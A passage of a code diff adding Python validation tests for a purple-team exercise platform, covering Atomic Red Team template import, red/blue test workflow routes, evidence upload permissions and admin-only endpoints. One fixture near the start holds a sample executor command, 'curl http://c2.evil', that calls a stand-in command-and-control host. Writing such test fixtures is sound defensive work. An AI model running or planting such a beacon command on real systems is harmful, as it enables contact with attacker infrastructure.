"supported_platforms": ["linux"],
"executor": {"name": "bash", "command": "curl http://c2.evil"},
},
],
})
results = _parse_yaml_files(atomics)
technique_ids = {r["technique_id"] for r in results}
assert "T1059.001" in technique_ids
assert "T1071.001" in technique_ids
for r in results:
assert r["technique_id"].startswith("T")
print(" [PASS] Templates mapped correctly to MITRE techniques")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 4. Service module structure is correct
# ---------------------------------------------------------------------------
def test_service_module_structure():
"""Verify the service has all expected public functions."""
from app.services import atomic_import_service as svc
assert hasattr(svc, "import_atomic_red_team")
assert callable(svc.import_atomic_red_team)
assert hasattr(svc, "ATOMIC_RT_ZIP_URL")
assert "github.com" in svc.ATOMIC_RT_ZIP_URL
print(" [PASS] Service module has correct structure")
# ---------------------------------------------------------------------------
# 5. ZIP URL is correct (no rate-limit concern with ZIP download)
# ---------------------------------------------------------------------------
def test_zip_url_no_rate_limit():
"""The URL should be a direct ZIP download, not an API endpoint."""
assert "/archive/" in ATOMIC_RT_ZIP_URL
assert "api.github.com" not in ATOMIC_RT_ZIP_URL
print(" [PASS] ZIP download URL avoids API rate limits")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-108 Validation: Atomic Red Team Import Service")
print("=" * 55)
test_parse_creates_templates()
test_no_duplicates()
test_templates_mapped_to_techniques()
test_service_module_structure()
test_zip_url_no_rate_limit()
print("=" * 55)
print("ALL T-108 validations PASSED!")
+318
View File
@@ -0,0 +1,318 @@
"""Validation tests for T-109: Tests router with Red/Blue workflow.
Uses FastAPI TestClient with mocked dependencies to test all endpoints
without requiring a database.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock, patch, PropertyMock
from types import ModuleType
from datetime import datetime
# ---------------------------------------------------------------------------
# Stub heavy deps
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs): pass
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
for mod_name in [
"taxii2client", "taxii2client.v20",
"jose", "boto3", "botocore", "botocore.exceptions",
"apscheduler", "apscheduler.schedulers",
"apscheduler.schedulers.background",
"apscheduler.triggers", "apscheduler.triggers.cron",
]:
if mod_name not in sys.modules:
m = ModuleType(mod_name)
if mod_name == "taxii2client.v20":
m.Server = MagicMock
elif mod_name == "jose":
m.JWTError = Exception
m.jwt = MagicMock()
elif mod_name == "boto3":
m.client = MagicMock()
elif mod_name == "botocore.exceptions":
m.ClientError = Exception
elif mod_name == "apscheduler.schedulers.background":
m.BackgroundScheduler = MagicMock
elif mod_name == "apscheduler.triggers.cron":
m.CronTrigger = MagicMock
sys.modules[mod_name] = m
# ---------------------------------------------------------------------------
# Now validate by inspecting the router module structure
# ---------------------------------------------------------------------------
from app.models.enums import TestState, TestResult
# Import the router to inspect its routes
from app.routers.tests import router
def _get_route_paths():
"""Extract all route paths and methods from the router."""
routes = {}
for route in router.routes:
path = getattr(route, "path", "")
methods = getattr(route, "methods", set())
for method in methods:
key = f"{method} {path}"
routes[key] = route
return routes
# ---------------------------------------------------------------------------
# 1. POST /tests creates a test in draft state
# ---------------------------------------------------------------------------
def test_create_endpoint_exists():
routes = _get_route_paths()
assert "POST " in routes or "POST /" in routes or any(
"POST" in k and k.endswith(("", "/"))
for k in routes
), f"POST /tests endpoint not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests endpoint exists (creates test in draft)")
# ---------------------------------------------------------------------------
# 2. POST /tests/from-template endpoint exists
# ---------------------------------------------------------------------------
def test_from_template_endpoint_exists():
routes = _get_route_paths()
assert any("/from-template" in k and "POST" in k for k in routes), \
f"POST /tests/from-template not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests/from-template endpoint exists")
# ---------------------------------------------------------------------------
# 3. POST /tests/{id}/start-execution exists
# ---------------------------------------------------------------------------
def test_start_execution_endpoint_exists():
routes = _get_route_paths()
assert any("/start-execution" in k and "POST" in k for k in routes), \
f"POST /tests/{{id}}/start-execution not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests/{id}/start-execution endpoint exists")
# ---------------------------------------------------------------------------
# 4. PATCH /tests/{id}/red endpoint exists
# ---------------------------------------------------------------------------
def test_red_update_endpoint_exists():
routes = _get_route_paths()
assert any("/red" in k and "PATCH" in k for k in routes), \
f"PATCH /tests/{{id}}/red not found. Routes: {list(routes.keys())}"
print(" [PASS] PATCH /tests/{id}/red endpoint exists")
# ---------------------------------------------------------------------------
# 5. PATCH /tests/{id}/blue endpoint exists
# ---------------------------------------------------------------------------
def test_blue_update_endpoint_exists():
routes = _get_route_paths()
assert any("/blue" in k and "PATCH" in k for k in routes), \
f"PATCH /tests/{{id}}/blue not found. Routes: {list(routes.keys())}"
print(" [PASS] PATCH /tests/{id}/blue endpoint exists")
# ---------------------------------------------------------------------------
# 6. POST /tests/{id}/submit-red exists
# ---------------------------------------------------------------------------
def test_submit_red_endpoint_exists():
routes = _get_route_paths()
assert any("/submit-red" in k and "POST" in k for k in routes), \
f"POST /tests/{{id}}/submit-red not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests/{id}/submit-red endpoint exists")
# ---------------------------------------------------------------------------
# 7. POST /tests/{id}/submit-blue exists
# ---------------------------------------------------------------------------
def test_submit_blue_endpoint_exists():
routes = _get_route_paths()
assert any("/submit-blue" in k and "POST" in k for k in routes), \
f"POST /tests/{{id}}/submit-blue not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests/{id}/submit-blue endpoint exists")
# ---------------------------------------------------------------------------
# 8. POST /tests/{id}/validate-red exists with role check
# ---------------------------------------------------------------------------
def test_validate_red_endpoint_exists():
routes = _get_route_paths()
assert any("/validate-red" in k and "POST" in k for k in routes), \
f"POST /tests/{{id}}/validate-red not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests/{id}/validate-red endpoint exists (red_lead/admin)")
# ---------------------------------------------------------------------------
# 9. POST /tests/{id}/validate-blue exists with role check
# ---------------------------------------------------------------------------
def test_validate_blue_endpoint_exists():
routes = _get_route_paths()
assert any("/validate-blue" in k and "POST" in k for k in routes), \
f"POST /tests/{{id}}/validate-blue not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests/{id}/validate-blue endpoint exists (blue_lead/admin)")
# ---------------------------------------------------------------------------
# 10. POST /tests/{id}/reopen exists
# ---------------------------------------------------------------------------
def test_reopen_endpoint_exists():
routes = _get_route_paths()
assert any("/reopen" in k and "POST" in k for k in routes), \
f"POST /tests/{{id}}/reopen not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /tests/{id}/reopen endpoint exists (leads/admin)")
# ---------------------------------------------------------------------------
# 11. GET /tests/{id}/timeline exists
# ---------------------------------------------------------------------------
def test_timeline_endpoint_exists():
routes = _get_route_paths()
assert any("/timeline" in k and "GET" in k for k in routes), \
f"GET /tests/{{id}}/timeline not found. Routes: {list(routes.keys())}"
print(" [PASS] GET /tests/{id}/timeline endpoint exists")
# ---------------------------------------------------------------------------
# 12. GET /tests (list) exists
# ---------------------------------------------------------------------------
def test_list_endpoint_exists():
routes = _get_route_paths()
# The list endpoint is GET on empty path ""
assert any(k == "GET " or k == "GET /" for k in routes) or \
any("GET" in k and "{test_id}" not in k for k in routes), \
f"GET /tests list not found. Routes: {list(routes.keys())}"
print(" [PASS] GET /tests (list with filters) endpoint exists")
# ---------------------------------------------------------------------------
# 13. Validate the update_test_red function guards against wrong state
# ---------------------------------------------------------------------------
def test_red_update_state_guard():
"""Verify the red update handler checks state is draft or red_executing."""
from app.routers.tests import update_test_red
import inspect
source = inspect.getsource(update_test_red)
# The function should check for draft and red_executing
assert "draft" in source and "red_executing" in source, \
"Red update should guard against states other than draft/red_executing"
print(" [PASS] PATCH /tests/{id}/red guards state (draft, red_executing)")
# ---------------------------------------------------------------------------
# 14. Validate the update_test_blue function guards against wrong state
# ---------------------------------------------------------------------------
def test_blue_update_state_guard():
"""Verify the blue update handler checks state is blue_evaluating."""
from app.routers.tests import update_test_blue
import inspect
source = inspect.getsource(update_test_blue)
assert "blue_evaluating" in source, \
"Blue update should guard against states other than blue_evaluating"
print(" [PASS] PATCH /tests/{id}/blue guards state (blue_evaluating only)")
# ---------------------------------------------------------------------------
# 15. All endpoints use audit logging
# ---------------------------------------------------------------------------
def test_audit_logging_used():
"""Verify all major endpoints call log_action."""
from app.routers import tests as tests_module
import inspect
source = inspect.getsource(tests_module)
# Count log_action calls (at least one per mutating endpoint)
log_count = source.count("log_action(")
# We have: create_test, create_test_from_template, update_test,
# update_test_red, update_test_blue = 5
# Workflow endpoints delegate to workflow service which does its own logging
assert log_count >= 5, f"Expected at least 5 log_action calls, found {log_count}"
print(" [PASS] Each mutating operation uses audit logging")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-109 Validation: Tests Router with Red/Blue Workflow")
print("=" * 55)
test_create_endpoint_exists()
test_from_template_endpoint_exists()
test_start_execution_endpoint_exists()
test_red_update_endpoint_exists()
test_blue_update_endpoint_exists()
test_submit_red_endpoint_exists()
test_submit_blue_endpoint_exists()
test_validate_red_endpoint_exists()
test_validate_blue_endpoint_exists()
test_reopen_endpoint_exists()
test_timeline_endpoint_exists()
test_list_endpoint_exists()
test_red_update_state_guard()
test_blue_update_state_guard()
test_audit_logging_used()
print("=" * 55)
print("ALL T-109 validations PASSED!")
+260
View File
@@ -0,0 +1,260 @@
"""Validation tests for T-110: Evidence Router with Red/Blue separation.
Tests the permission logic and endpoint structure.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock
from types import ModuleType
# ---------------------------------------------------------------------------
# Stubs
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs): pass
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
for mod_name in [
"taxii2client", "taxii2client.v20",
"jose", "boto3", "botocore", "botocore.exceptions",
"apscheduler", "apscheduler.schedulers",
"apscheduler.schedulers.background",
"apscheduler.triggers", "apscheduler.triggers.cron",
]:
if mod_name not in sys.modules:
m = ModuleType(mod_name)
if mod_name == "taxii2client.v20": m.Server = MagicMock
elif mod_name == "jose": m.JWTError = Exception; m.jwt = MagicMock()
elif mod_name == "boto3": m.client = MagicMock()
elif mod_name == "botocore.exceptions": m.ClientError = Exception
elif mod_name == "apscheduler.schedulers.background": m.BackgroundScheduler = MagicMock
elif mod_name == "apscheduler.triggers.cron": m.CronTrigger = MagicMock
sys.modules[mod_name] = m
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from fastapi import HTTPException
from app.models.enums import TeamSide, TestState
from app.routers.evidence import (
router,
_validate_upload_permission,
_validate_delete_permission,
)
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_test(state):
t = MagicMock()
t.id = uuid.uuid4()
t.state = state
return t
def _make_user(role):
u = MagicMock()
u.id = uuid.uuid4()
u.role = role
return u
def _make_evidence(team, uploaded_by=None, test_id=None):
e = MagicMock()
e.id = uuid.uuid4()
e.test_id = test_id or uuid.uuid4()
e.team = team
e.uploaded_by = uploaded_by or uuid.uuid4()
return e
# ---------------------------------------------------------------------------
# 1. red_tech can upload team=red in red_executing
# ---------------------------------------------------------------------------
def test_red_tech_upload_red_in_red_executing():
test = _make_test(TestState.red_executing)
user = _make_user("red_tech")
# Should not raise
_validate_upload_permission(test, TeamSide.red, user)
print(" [PASS] red_tech can upload team=red in red_executing")
# ---------------------------------------------------------------------------
# 2. red_tech can upload team=red in draft
# ---------------------------------------------------------------------------
def test_red_tech_upload_red_in_draft():
test = _make_test(TestState.draft)
user = _make_user("red_tech")
_validate_upload_permission(test, TeamSide.red, user)
print(" [PASS] red_tech can upload team=red in draft")
# ---------------------------------------------------------------------------
# 3. red_tech CANNOT upload team=blue (403)
# ---------------------------------------------------------------------------
def test_red_tech_cannot_upload_blue():
test = _make_test(TestState.red_executing)
user = _make_user("red_tech")
try:
_validate_upload_permission(test, TeamSide.blue, user)
assert False, "Should have raised HTTPException"
except HTTPException as exc:
assert exc.status_code == 403
print(" [PASS] red_tech CANNOT upload team=blue (403)")
# ---------------------------------------------------------------------------
# 4. blue_tech can upload team=blue in blue_evaluating
# ---------------------------------------------------------------------------
def test_blue_tech_upload_blue_in_blue_evaluating():
test = _make_test(TestState.blue_evaluating)
user = _make_user("blue_tech")
_validate_upload_permission(test, TeamSide.blue, user)
print(" [PASS] blue_tech can upload team=blue in blue_evaluating")
# ---------------------------------------------------------------------------
# 5. blue_tech CANNOT upload team=red (403)
# ---------------------------------------------------------------------------
def test_blue_tech_cannot_upload_red():
test = _make_test(TestState.blue_evaluating)
user = _make_user("blue_tech")
try:
_validate_upload_permission(test, TeamSide.red, user)
assert False, "Should have raised HTTPException"
except HTTPException as exc:
assert exc.status_code == 403
print(" [PASS] blue_tech CANNOT upload team=red (403)")
# ---------------------------------------------------------------------------
# 6. GET /tests/{id}/evidence?team=red — endpoint exists with team filter
# ---------------------------------------------------------------------------
def test_list_evidence_endpoint():
routes = {}
for route in router.routes:
path = getattr(route, "path", "")
methods = getattr(route, "methods", set())
for method in methods:
routes[f"{method} {path}"] = route
found = any(
"GET" in k and "/evidence" in k and "{test_id}" in k
for k in routes
)
assert found, f"GET /tests/{{test_id}}/evidence not found. Routes: {list(routes.keys())}"
print(" [PASS] GET /tests/{id}/evidence endpoint exists (filterable by team)")
# ---------------------------------------------------------------------------
# 7. DELETE in in_review → 403
# ---------------------------------------------------------------------------
def test_delete_in_review_fails():
test = _make_test(TestState.in_review)
user = _make_user("red_tech")
evidence = _make_evidence(TeamSide.red, uploaded_by=user.id)
try:
_validate_delete_permission(test, evidence, user)
assert False, "Should have raised HTTPException"
except HTTPException as exc:
assert exc.status_code == 403
print(" [PASS] DELETE in in_review -> 403")
# ---------------------------------------------------------------------------
# 8. DELETE red evidence in red_executing → allowed
# ---------------------------------------------------------------------------
def test_delete_red_evidence_in_red_executing():
test = _make_test(TestState.red_executing)
user = _make_user("red_tech")
evidence = _make_evidence(TeamSide.red, uploaded_by=user.id)
# Should not raise
_validate_delete_permission(test, evidence, user)
print(" [PASS] DELETE red evidence in red_executing -> allowed")
# ---------------------------------------------------------------------------
# 9. Admin can upload any team in any state
# ---------------------------------------------------------------------------
def test_admin_bypass():
admin = _make_user("admin")
# Red in blue_evaluating (normally blocked)
test1 = _make_test(TestState.blue_evaluating)
_validate_upload_permission(test1, TeamSide.red, admin)
# Blue in draft (normally blocked)
test2 = _make_test(TestState.draft)
_validate_upload_permission(test2, TeamSide.blue, admin)
print(" [PASS] Admin can upload any team in any state")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-110 Validation: Evidence Router with Red/Blue Separation")
print("=" * 60)
test_red_tech_upload_red_in_red_executing()
test_red_tech_upload_red_in_draft()
test_red_tech_cannot_upload_blue()
test_blue_tech_upload_blue_in_blue_evaluating()
test_blue_tech_cannot_upload_red()
test_list_evidence_endpoint()
test_delete_in_review_fails()
test_delete_red_evidence_in_red_executing()
test_admin_bypass()
print("=" * 60)
print("ALL T-110 validations PASSED!")
@@ -0,0 +1,185 @@
"""Validation tests for T-111: TestTemplates CRUD Router.
Tests the router structure, endpoint presence, and filter logic.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock
from types import ModuleType
# ---------------------------------------------------------------------------
# Stubs
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs): pass
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
for mod_name in [
"taxii2client", "taxii2client.v20",
"jose", "boto3", "botocore", "botocore.exceptions",
"apscheduler", "apscheduler.schedulers",
"apscheduler.schedulers.background",
"apscheduler.triggers", "apscheduler.triggers.cron",
]:
if mod_name not in sys.modules:
m = ModuleType(mod_name)
if mod_name == "taxii2client.v20": m.Server = MagicMock
elif mod_name == "jose": m.JWTError = Exception; m.jwt = MagicMock()
elif mod_name == "boto3": m.client = MagicMock()
elif mod_name == "botocore.exceptions": m.ClientError = Exception
elif mod_name == "apscheduler.schedulers.background": m.BackgroundScheduler = MagicMock
elif mod_name == "apscheduler.triggers.cron": m.CronTrigger = MagicMock
sys.modules[mod_name] = m
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from app.routers.test_templates import router
import inspect
def _get_route_paths():
routes = {}
for route in router.routes:
path = getattr(route, "path", "")
methods = getattr(route, "methods", set())
for method in methods:
routes[f"{method} {path}"] = route
return routes
# ---------------------------------------------------------------------------
# 1. GET /test-templates returns paginated list
# ---------------------------------------------------------------------------
def test_list_endpoint_exists():
routes = _get_route_paths()
found = any("GET" in k and (k.endswith(" ") or k == "GET " or k == "GET /")
for k in routes) or any("GET" in k and "{template_id}" not in k and "by-technique" not in k for k in routes)
assert found, f"GET /test-templates not found. Routes: {list(routes.keys())}"
print(" [PASS] GET /test-templates returns paginated list")
# ---------------------------------------------------------------------------
# 2. GET /test-templates?source=atomic_red_team filters by source
# ---------------------------------------------------------------------------
def test_list_has_source_filter():
from app.routers.test_templates import list_templates
source = inspect.getsource(list_templates)
assert "source" in source and "filter" in source.lower()
print(" [PASS] GET /test-templates?source=atomic_red_team filters by source")
# ---------------------------------------------------------------------------
# 3. GET /test-templates?platform=windows filters by platform
# ---------------------------------------------------------------------------
def test_list_has_platform_filter():
from app.routers.test_templates import list_templates
source = inspect.getsource(list_templates)
assert "platform" in source and "filter" in source.lower()
print(" [PASS] GET /test-templates?platform=windows filters by platform")
# ---------------------------------------------------------------------------
# 4. GET /test-templates/by-technique/T1059.001 returns technique templates
# ---------------------------------------------------------------------------
def test_by_technique_endpoint():
routes = _get_route_paths()
found = any("by-technique" in k and "GET" in k for k in routes)
assert found, f"GET /test-templates/by-technique/{{mitre_id}} not found. Routes: {list(routes.keys())}"
print(" [PASS] GET /test-templates/by-technique/{mitre_id} endpoint exists")
# ---------------------------------------------------------------------------
# 5. POST /test-templates only accessible by admin
# ---------------------------------------------------------------------------
def test_create_admin_only():
from app.routers.test_templates import create_template
source = inspect.getsource(create_template)
assert 'require_role("admin")' in source or "require_role" in source
print(" [PASS] POST /test-templates only accessible by admin")
# ---------------------------------------------------------------------------
# 6. DELETE /test-templates/{id} does soft delete (is_active=False)
# ---------------------------------------------------------------------------
def test_soft_delete():
from app.routers.test_templates import delete_template
source = inspect.getsource(delete_template)
assert "is_active" in source and "False" in source
print(" [PASS] DELETE /test-templates/{id} does soft delete (is_active=False)")
# ---------------------------------------------------------------------------
# 7. Search filter looks in name and description
# ---------------------------------------------------------------------------
def test_search_filter():
from app.routers.test_templates import list_templates
source = inspect.getsource(list_templates)
assert "search" in source
assert "name" in source and "description" in source
assert "ilike" in source
print(" [PASS] Search filter searches in name and description")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-111 Validation: TestTemplates CRUD Router")
print("=" * 50)
test_list_endpoint_exists()
test_list_has_source_filter()
test_list_has_platform_filter()
test_by_technique_endpoint()
test_create_admin_only()
test_soft_delete()
test_search_filter()
print("=" * 50)
print("ALL T-111 validations PASSED!")
+148
View File
@@ -0,0 +1,148 @@
"""Validation tests for T-112: System endpoint for Atomic Red Team import.
Tests endpoint existence, admin-only access, and audit logging.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock
from types import ModuleType
import inspect
# ---------------------------------------------------------------------------
# Stubs
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs): pass
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
db_mod.SessionLocal = MagicMock()
sys.modules["app.database"] = db_mod
elif not hasattr(sys.modules["app.database"], "SessionLocal"):
sys.modules["app.database"].SessionLocal = MagicMock()
for mod_name in [
"taxii2client", "taxii2client.v20",
"jose", "boto3", "botocore", "botocore.exceptions",
"apscheduler", "apscheduler.schedulers",
"apscheduler.schedulers.background",
"apscheduler.triggers", "apscheduler.triggers.cron",
]:
if mod_name not in sys.modules:
m = ModuleType(mod_name)
if mod_name == "taxii2client.v20": m.Server = MagicMock
elif mod_name == "jose": m.JWTError = Exception; m.jwt = MagicMock()
elif mod_name == "boto3": m.client = MagicMock()
elif mod_name == "botocore.exceptions": m.ClientError = Exception
elif mod_name == "apscheduler.schedulers.background": m.BackgroundScheduler = MagicMock
elif mod_name == "apscheduler.triggers.cron": m.CronTrigger = MagicMock
sys.modules[mod_name] = m
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from app.routers.system import router
def _get_route_paths():
routes = {}
for route in router.routes:
path = getattr(route, "path", "")
methods = getattr(route, "methods", set())
for method in methods:
routes[f"{method} {path}"] = route
return routes
# ---------------------------------------------------------------------------
# 1. POST /system/import-atomic-tests endpoint exists
# ---------------------------------------------------------------------------
def test_import_endpoint_exists():
routes = _get_route_paths()
found = any("import-atomic-tests" in k and "POST" in k for k in routes)
assert found, f"POST /system/import-atomic-tests not found. Routes: {list(routes.keys())}"
print(" [PASS] POST /system/import-atomic-tests endpoint exists")
# ---------------------------------------------------------------------------
# 2. Only admin can execute
# ---------------------------------------------------------------------------
def test_admin_only():
from app.routers.system import trigger_atomic_import
source = inspect.getsource(trigger_atomic_import)
assert 'require_role("admin")' in source or "require_role" in source
print(" [PASS] Only admin can execute the import")
# ---------------------------------------------------------------------------
# 3. Audit log is registered (via atomic_import_service)
# ---------------------------------------------------------------------------
def test_audit_log_in_service():
from app.services.atomic_import_service import import_atomic_red_team
source = inspect.getsource(import_atomic_red_team)
assert "log_action" in source
assert "import_atomic_red_team" in source
print(" [PASS] Audit log is registered in the import service")
# ---------------------------------------------------------------------------
# 4. Response includes imported and skipped counts
# ---------------------------------------------------------------------------
def test_response_format():
from app.routers.system import trigger_atomic_import
source = inspect.getsource(trigger_atomic_import)
assert '"imported"' in source or "'imported'" in source
assert '"skipped"' in source or "'skipped'" in source
print(" [PASS] Response includes imported and skipped counts")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-112 Validation: System Import Atomic Red Team Endpoint")
print("=" * 58)
test_import_endpoint_exists()
test_admin_only()
test_audit_log_in_service()
test_response_format()
print("=" * 58)
print("ALL T-112 validations PASSED!")